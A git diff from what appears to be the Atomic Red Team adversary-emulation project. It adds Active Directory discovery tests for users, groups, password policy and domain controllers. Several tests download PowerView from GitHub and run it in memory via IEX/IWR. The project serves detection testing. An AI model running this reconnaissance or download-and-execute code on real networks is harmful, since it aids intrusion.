+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -843,6 +846,8 @@ discovery,T1201,Password Policy Discovery,4,Examine password expiration policy -
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
 discovery,T1201,Password Policy Discovery,7,Examine password policy - macOS,4b7fa042-9482-45e1-b348-4b756b2a0742,bash
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,1,Process Discovery - ps,4ff64f0b-aaf2-4866-b39d-38d9791407cc,sh
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
@@ -862,7 +867,10 @@ discovery,T1018,Remote System Discovery,12,Remote System Discovery - ip neighbou
 discovery,T1018,Remote System Discovery,13,Remote System Discovery - ip route,1a4ebe70-31d0-417b-ade2-ef4cb3e7d0e1,sh
 discovery,T1018,Remote System Discovery,14,Remote System Discovery - ip tcp_metrics,6c2da894-0b57-43cb-87af-46ea3b501388,sh
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
-discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,3,Security Software Discovery - ps (macOS),ba62ce11-e820-485f-9c17-6f3c857cd840,sh
diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv
index 2a0ede05..b504ab75 100644
--- a/atomics/Indexes/Indexes-CSV/windows-index.csv
+++ b/atomics/Indexes/Indexes-CSV/windows-index.csv
@@ -525,7 +525,8 @@ discovery,T1087.002,Domain Account,7,Adfind - Enumerate Active Directory User Ob
 discovery,T1087.002,Domain Account,8,Adfind - Enumerate Active Directory Exchange AD Objects,5e2938fb-f919-47b6-8b29-2f6a1f718e99,command_prompt
 discovery,T1087.002,Domain Account,9,Enumerate Default Domain Admin Details (Domain),c70ab9fd-19e2-4e02-a83c-9cfa8eaa8fef,command_prompt
 discovery,T1087.002,Domain Account,10,Enumerate Active Directory for Unconstrained Delegation,46f8dbe9-22a5-4770-8513-66119c5be63b,powershell
-discovery,T1087.002,Domain Account,11,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
+discovery,T1087.002,Domain Account,11,Get-DomainUser with PowerView,93662494-5ed7-4454-a04c-8c8372808ac2,powershell
+discovery,T1087.002,Domain Account,12,Enumerate Active Directory Users with ADSISearcher,02e8be5a-3065-4e54-8cc8-a14d138834d3,powershell
 discovery,T1069.002,Domain Groups,1,Basic Permission Groups Discovery Windows (Domain),dd66d77d-8998-48c0-8024-df263dc2ce5d,command_prompt
 discovery,T1069.002,Domain Groups,2,Permission Groups Discovery PowerShell (Domain),6d5d8c96-3d2a-4da9-9d6d-9a9d341899a7,powershell
 discovery,T1069.002,Domain Groups,3,Elevated group enumeration using net group (Domain),0afb5163-8181-432e-9405-4322710c0c37,command_prompt
@@ -534,9 +535,11 @@ discovery,T1069.002,Domain Groups,5,Find local admins on all machines in domain
 discovery,T1069.002,Domain Groups,6,Find Local Admins via Group Policy (PowerView),64fdb43b-5259-467a-b000-1b02c00e510a,powershell
 discovery,T1069.002,Domain Groups,7,Enumerate Users Not Requiring Pre Auth (ASRepRoast),870ba71e-6858-4f6d-895c-bb6237f6121b,powershell
 discovery,T1069.002,Domain Groups,8,Adfind - Query Active Directory Groups,48ddc687-82af-40b7-8472-ff1e742e8274,command_prompt
-discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
-discovery,T1069.002,Domain Groups,10,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
-discovery,T1069.002,Domain Groups,11,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,9,Enumerate Active Directory Groups with Get-AdGroup,3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8,powershell
+discovery,T1069.002,Domain Groups,10,Enumerate Active Directory Groups with ADSISearcher,9f4e344b-8434-41b3-85b1-d38f29d148d0,powershell
+discovery,T1069.002,Domain Groups,11,Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting),43fa81fb-34bb-4b5f-867b-03c7dbe0e3d8,powershell
+discovery,T1069.002,Domain Groups,12,Get-DomainGroupMember with PowerView,46352f40-f283-4fe5-b56d-d9a71750e145,powershell
+discovery,T1069.002,Domain Groups,13,Get-DomainGroup with PowerView,5a8a181c-2c8e-478d-a943-549305a01230,powershell
 discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery,4700a710-c821-4e17-a3ec-9e4c81d6845f,command_prompt
 discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest,2e22641d-0498-48d2-b9ff-c71e496ccdbe,command_prompt
 discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests,c58fbc62-8a62-489e-8f2d-3565d7d96f30,powershell
@@ -565,6 +568,8 @@ discovery,T1040,Network Sniffing,3,Packet Capture Windows Command Prompt,a5b2f6a
 discovery,T1040,Network Sniffing,4,Windows Internal Packet Capture,b5656f67-d67f-4de8-8e62-b5581630f528,command_prompt
 discovery,T1201,Password Policy Discovery,5,Examine local password policy - Windows,4588d243-f24e-4549-b2e3-e627acc089f6,command_prompt
 discovery,T1201,Password Policy Discovery,6,Examine domain password policy - Windows,46c2c362-2679-4ef5-aec9-0e958e135be4,command_prompt
+discovery,T1201,Password Policy Discovery,8,Get-DomainPolicy with PowerView,3177f4da-3d4b-4592-8bdc-aa23d0b2e843,powershell
+discovery,T1201,Password Policy Discovery,9,Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy,b2698b33-984c-4a1c-93bb-e4ba72a0babb,powershell
 discovery,T1120,Peripheral Device Discovery,1,Win32_PnPEntity Hardware Inventory,2cb4dbf2-2dca-4597-8678-4d39d207a3a5,powershell
 discovery,T1057,Process Discovery,2,Process Discovery - tasklist,c5806a4f-62b8-4900-980b-c7ec004e9908,command_prompt
 discovery,T1012,Query Registry,1,Query Registry,8f7578c4-9863-4d83-875c-a565573bbdf0,command_prompt
@@ -578,7 +583,10 @@ discovery,T1018,Remote System Discovery,9,Remote System Discovery - adidnsdump,9
 discovery,T1018,Remote System Discovery,10,Adfind - Enumerate Active Directory Computer Objects,a889f5be-2d54-4050-bd05-884578748bb4,command_prompt
 discovery,T1018,Remote System Discovery,11,Adfind - Enumerate Active Directory Domain Controller Objects,5838c31e-a0e2-4b9f-b60a-d79d2cb7995e,command_prompt
 discovery,T1018,Remote System Discovery,15,Enumerate domain computers within Active Directory using DirectorySearcher,962a6017-1c09-45a6-880b-adc9c57cb22e,powershell
-discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,16,Enumerate Active Directory Computers with Get-AdComputer,97e89d9e-e3f5-41b5-a90f-1e0825df0fdf,powershell
+discovery,T1018,Remote System Discovery,17,Enumerate Active Directory Computers with ADSISearcher,64ede6ac-b57a-41c2-a7d1-32c6cd35397d,powershell
+discovery,T1018,Remote System Discovery,18,Get-DomainController with PowerView,b9d2e8ca-5520-4737-8076-4f08913da2c4,powershell
+discovery,T1018,Remote System Discovery,19,Get-wmiobject to Enumerate Domain Controllers,e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad,powershell
 discovery,T1518.001,Security Software Discovery,1,Security Software Discovery,f92a380f-ced9-491f-b338-95a991418ce2,command_prompt
 discovery,T1518.001,Security Software Discovery,2,Security Software Discovery - powershell,7f566051-f033-49fb-89de-b6bacab730f0,powershell
 discovery,T1518.001,Security Software Discovery,5,Security Software Discovery - Sysmon Service,fe613cf3-8009-4446-9a0f-bc78a15b66c9,command_prompt
diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md
index 0c8c1184..599eca55 100644
--- a/atomics/Indexes/Indexes-Markdown/index.md
+++ b/atomics/Indexes/Indexes-Markdown/index.md
@@ -1283,7 +1283,8 @@
     - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
     - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
     - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
-    - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
+    - Atomic Test #11: Get-DomainUser with PowerView [windows]
+    - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
   - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
     - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
     - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -1293,9 +1294,11 @@
     - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
     - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
     - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
-    - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
-    - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
-    - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
+    - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+    - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+    - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+    - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+    - Atomic Test #13: Get-DomainGroup with PowerView [windows]
   - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
     - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
     - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -1355,6 +1358,8 @@
     - Atomic Test #5: Examine local password policy - Windows [windows]
     - Atomic Test #6: Examine domain password policy - Windows [windows]
     - Atomic Test #7: Examine password policy - macOS [macos]
+    - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+    - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
   - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
     - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
   - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -1379,7 +1384,10 @@
     - Atomic Test #13: Remote System Discovery - ip route [linux]
     - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
     - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
-    - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
+    - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+    - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+    - Atomic Test #18: Get-DomainController with PowerView [windows]
+    - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
   - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
     - Atomic Test #1: Security Software Discovery [windows]
     - Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md
index 9aca2c0d..0b9cc997 100644
--- a/atomics/Indexes/Indexes-Markdown/windows-index.md
+++ b/atomics/Indexes/Indexes-Markdown/windows-index.md
@@ -907,7 +907,8 @@
     - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
     - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
     - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
-    - Atomic Test #11: Enumerate Active Directory Users with ADSISearcher [windows]
+    - Atomic Test #11: Get-DomainUser with PowerView [windows]
+    - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
   - [T1069.002 Domain Groups](../../T1069.002/T1069.002.md)
     - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
     - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
@@ -917,9 +918,11 @@
     - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
     - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
     - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
-    - Atomic Test #9: Enumerate Active Directory Groups with ADSISearcher [windows]
-    - Atomic Test #10: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
-    - Atomic Test #11: Get-DomainGroupMember with PowerView [windows]
+    - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
+    - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
+    - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
+    - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
+    - Atomic Test #13: Get-DomainGroup with PowerView [windows]
   - [T1482 Domain Trust Discovery](../../T1482/T1482.md)
     - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
     - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
@@ -958,6 +961,8 @@
   - [T1201 Password Policy Discovery](../../T1201/T1201.md)
     - Atomic Test #5: Examine local password policy - Windows [windows]
     - Atomic Test #6: Examine domain password policy - Windows [windows]
+    - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
+    - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
   - [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
     - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
   - T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -976,7 +981,10 @@
     - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
     - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
     - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
-    - Atomic Test #16: Enumerate Active Directory Computers with ADSISearcher [windows]
+    - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
+    - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
+    - Atomic Test #18: Get-DomainController with PowerView [windows]
+    - Atomic Test #19: Get-wmiobject to Enumerate Domain Controllers [windows]
   - [T1518.001 Security Software Discovery](../../T1518.001/T1518.001.md)
     - Atomic Test #1: Security Software Discovery [windows]
     - Atomic Test #2: Security Software Discovery - powershell [windows]
diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml
index 32ccfe39..c4eb414d 100644
--- a/atomics/Indexes/index.yaml
+++ b/atomics/Indexes/index.yaml
@@ -55101,6 +55101,19 @@ discovery:
           -Server #{domain}
 
 '
+    - name: Get-DomainUser with PowerView
+      auto_generated_guid: 93662494-5ed7-4454-a04c-8c8372808ac2
+      description: 'Utilizing PowerView, run Get-DomainUser to identify the domain
+        users. Upon execution, Users within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainUser -verbose
+        name: powershell
     - name: Enumerate Active Directory Users with ADSISearcher
       auto_generated_guid: 02e8be5a-3065-4e54-8cc8-a14d138834d3
       description: |
@@ -55306,6 +55319,19 @@ discovery:
       executor:
         command: "#{adfind_path} -f (objectcategory=group)\n"
         name: command_prompt
+    - name: Enumerate Active Directory Groups with Get-AdGroup
+      auto_generated_guid: 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8
+      description: |
+        The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory.
+        Upon successful execution a listing of groups will output with their paths in AD.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        command: 'Get-AdGroup -Filter *
+
+'
     - name: Enumerate Active Directory Groups with ADSISearcher
       auto_generated_guid: 9f4e344b-8434-41b3-85b1-d38f29d148d0
       description: |
@@ -55371,6 +55397,19 @@ discovery:
           [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
           IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroupMember "Domain Admins"
         name: powershell
+    - name: Get-DomainGroup with PowerView
+      auto_generated_guid: 5a8a181c-2c8e-478d-a943-549305a01230
+      description: 'Utilizing PowerView, run Get-DomainGroup to identify the domain
+        groups. Upon execution, Groups within the domain will be listed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainGroup -verbose
+        name: powershell
   T1482:
     technique:
       external_references:
@@ -56940,6 +56979,32 @@ discovery:
       executor:
         command: pwpolicy getaccountpolicies
         name: bash
+    - name: Get-DomainPolicy with PowerView
+      auto_generated_guid: 3177f4da-3d4b-4592-8bdc-aa23d0b2e843
+      description: 'Utilizing PowerView, run Get-DomainPolicy to return the default
+        domain policy or the domain controller policy for the current domain or a
+        specified domain/domain controller.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainPolicy -verbose
+        name: powershell
+    - name: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy
+      auto_generated_guid: b2698b33-984c-4a1c-93bb-e4ba72a0babb
+      description: |
+        The following Atomic test will utilize get-addefaultdomainpasswordpolicy to enumerate domain password policy.
+        Upon successful execution a listing of the policy implemented will display.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-addefaultdomainpasswordpolicy?view=windowsserver2022-ps
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-addefaultdomainpasswordpolicy
   T1120:
     technique:
       created: '2017-05-31T21:31:28.471Z'
@@ -57612,6 +57677,20 @@ discovery:
           Write-Host $Computer}
         name: powershell
         elevation_required: false
+    - name: Enumerate Active Directory Computers with Get-AdComputer
+      auto_generated_guid: 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+      description: |
+        The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+        Upon successful execution a listing of Computers will output with their paths in AD.
+        Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: 'Get-AdComputer -Filter *
+
+'
     - name: Enumerate Active Directory Computers with ADSISearcher
       auto_generated_guid: 64ede6ac-b57a-41c2-a7d1-32c6cd35397d
       description: |
@@ -57623,7 +57702,35 @@ discovery:
       executor:
         name: powershell
         elevation_required: false
-        command: ([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+        command: '([adsisearcher]"objectcategory=computer").FindAll(); ([adsisearcher]"objectcategory=computer").FindOne()
+
+'
+    - name: Get-DomainController with PowerView
+      auto_generated_guid: b9d2e8ca-5520-4737-8076-4f08913da2c4
+      description: 'Utilizing PowerView, run Get-DomainController to identify the
+        Domain Controller. Upon execution, information about the domain controller
+        within the domain will be displayed.
+
+'
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+          IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+        name: powershell
+    - name: Get-wmiobject to Enumerate Domain Controllers
+      auto_generated_guid: e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+      description: |
+        The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+        Upon successful execution a listing of Systems from AD will output with their paths.
+        Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+      supported_platforms:
+      - windows
+      executor:
+        name: powershell
+        elevation_required: false
+        command: get-wmiobject -class ds_computer -namespace root\directory\ldap
   T1518.001:
     technique:
       id: attack-pattern--cba37adb-d6fb-4610-b069-dd04c0643384
diff --git a/atomics/T1018/T1018.md b/atomics/T1018/T1018.md
index 3055bdc6..d835dbd4 100644
--- a/atomics/T1018/T1018.md
+++ b/atomics/T1018/T1018.md
@@ -36,7 +36,13 @@ Specific to macOS, the bonjour protocol exists to discover addition
 - [Atomic Test #15 - Enumerate domain computers within Active Directory using DirectorySearcher](#atomic-test-15---enumerate-domain-computers-within-active-directory-using-directorysearcher)
 
-- [Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-16---enumerate-active-directory-computers-with-adsisearcher)
+- [Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer](#atomic-test-16---enumerate-active-directory-computers-with-get-adcomputer)
+
+- [Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher](#atomic-test-17---enumerate-active-directory-computers-with-adsisearcher)
+
+- [Atomic Test #18 - Get-DomainController with PowerView](#atomic-test-18---get-domaincontroller-with-powerview)
+
+- [Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers](#atomic-test-19---get-wmiobject-to-enumerate-domain-controllers)
@@ -639,7 +645,37 @@ write-host "This PC must be manually added to a domain."

-## Atomic Test #16 - Enumerate Active Directory Computers with ADSISearcher
+## Atomic Test #16 - Enumerate Active Directory Computers with Get-AdComputer
+The following Atomic test will utilize Get-AdComputer to enumerate Computers within Active Directory.
+Upon successful execution a listing of Computers will output with their paths in AD.
+Reference: https://github.com/MicrosoftDocs/windows-powershell-docs/blob/main/docset/winserver2022-ps/activedirectory/Get-ADComputer.md
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 97e89d9e-e3f5-41b5-a90f-1e0825df0fdf
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+Get-AdComputer -Filter *
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #17 - Enumerate Active Directory Computers with ADSISearcher
 The following Atomic test will utilize ADSISearcher to enumerate computers within Active Directory.
 Upon successful execution a listing of computers will output with their paths in AD.
 Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/
@@ -666,4 +702,63 @@ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearc
+
+
+
+## Atomic Test #18 - Get-DomainController with PowerView
+Utilizing PowerView, run Get-DomainController to identify the Domain Controller. Upon execution, information about the domain controller within the domain will be displayed.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** b9d2e8ca-5520-4737-8076-4f08913da2c4
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
+IEX (IWR 'https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1' -UseBasicParsing); Get-DomainController -verbose
+```
+
+
+
+
+
+
+
+
+
+## Atomic Test #19 - Get-wmiobject to Enumerate Domain Controllers
+The following Atomic test will utilize get-wmiobject to enumerate Active Directory for Domain Controllers.
+Upon successful execution a listing of Systems from AD will output with their paths.
+Reference: https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.management/get-wmiobject?view=powershell-5.1
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e3cf5123-f6c9-4375-bdf2-1bb3ba43a1ad
+
+
+
+
+
+#### Attack Commands: Run with `powershell`!
+
+
+```powershell
+get-wmiobject -class ds_computer -namespace root\directory\ldap
+```
+
+
+
+
+
diff --git a/atomics/T1069.002/T1069.002.md b/atomics/T1069.002/T1069.002.md
index 999930da..b7d9a435 100644
--- a/atomics/T1069.002/T1069.002.md
+++ b/atomics/T1069.002/T1069.002.md
@@ -22,11 +22,15 @@ Commands such as net group /domain of the [Net](https://attack.mitr
 - [Atomic Test #8 - Adfind - Query Active Directory Groups](#atomic-test-8---adfind---query-active-directory-groups)
 
-- [Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-9---enumerate-active-directory-groups-with-adsisearcher)
+- [Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup](#atomic-test-9---enumerate-active-directory-groups-with-get-adgroup)
 
-- [Atomic Test #10 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-10---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+- [Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher](#atomic-test-10---enumerate-active-directory-groups-with-adsisearcher)
 
-- [Atomic Test #11 - Get-DomainGroupMember with PowerView](#atomic-test-11---get-domaingroupmember-with-powerview)
+- [Atomic Test #11 - Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting)](#atomic-test-11---get-aduser-enumeration-using-useraccountcontrol-flags-as-rep-roasting)
+
+- [Atomic Test #12 - Get-DomainGroupMember with PowerView](#atomic-test-12---get-domaingroupmember-with-powerview)
+
+- [Atomic Test #13 - Get-DomainGroup with PowerView](#atomic-test-13---get-domaingroup-with-powerview)
@@ -317,7 +321,37 @@ Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/maste

-## Atomic Test #9 - Enumerate Active Directory Groups with ADSISearcher +## Atomic Test #9 - Enumerate Active Directory Groups with Get-AdGroup +The following Atomic test will utilize Get-AdGroup to enumerate groups within Active Directory. +Upon successful execution a listing of groups will output with their paths in AD. +Reference: https://docs.microsoft.com/en-us/powershell/module/activedirectory/get-adgroup?view=windowsserver2022-ps + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 3d1fcd2a-e51c-4cbe-8d84-9a843bad8dc8 + + + + + + +#### Attack Commands: Run with `powershell`! + + +```powershell +Get-AdGroup -Filter * +``` + + + + + + +
+
+ +## Atomic Test #10 - Enumerate Active Directory Groups with ADSISearcher The following Atomic test will utilize ADSISearcher to enumerate groups within Active Directory. Upon successful execution a listing of groups will output with their paths in AD. Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearcher-type-accelerator-to-search-active-directory/ @@ -347,7 +381,7 @@ Reference: https://devblogs.microsoft.com/scripting/use-the-powershell-adsisearc

